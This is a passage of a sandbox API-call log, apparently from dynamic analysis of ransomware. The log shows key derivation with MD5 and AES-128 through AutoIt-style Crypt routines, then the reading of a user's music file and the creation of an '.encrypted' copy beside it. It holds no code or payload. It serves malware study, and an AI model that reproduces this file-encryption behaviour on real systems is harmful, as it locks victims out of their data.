[0037.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.263] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0037.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.263] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.263] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.264] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.264] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0037.264] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.264] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.264] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.264] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.264] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.264] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.264] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.264] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0037.264] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.264] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0037.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0037.264] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.264] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.264] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0037.265] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.265] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0037.265] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.265] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.265] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0037.265] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.265] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.265] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.265] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.265] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.265] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0037.265] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.265] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0037.265] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.265] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.265] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.265] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0037.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.266] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.266] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.266] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0037.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0037.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0037.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0037.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0037.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0037.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0037.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0037.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0037.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0037.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0037.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0037.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0037.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0037.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0037.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0037.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0037.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0037.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0037.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0037.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0037.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0037.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0037.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0037.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0037.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0037.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0037.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0037.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0037.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0037.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0037.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0037.268] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0037.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0037.268] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.268] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0037.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0037.268] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0037.268] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0037.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0037.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9c8 [0037.268] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.268] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0037.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0037.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0037.268] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0037.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0037.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0037.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.268] CryptDestroyHash (hHash=0x7c2100) returned 1 [0037.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0037.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0037.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0037.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0037.269] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0037.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0037.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0037.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0037.269] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0037.269] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.269] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.269] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0037.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0037.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0037.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0037.269] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3lv09d8.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.269] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.269] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0037.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0037.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0037.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0037.270] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.270] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.270] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0037.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0037.270] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.encrypted.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3lv09d8.encrypted.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0037.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0037.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0037.271] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0037.271] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.271] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0037.271] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0037.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0037.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.271] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0037.271] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0037.273] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x7317, lpOverlapped=0x0) returned 1 [0037.274] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0037.277] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0037.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17317) returned 0xac0018 [0037.277] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.277] 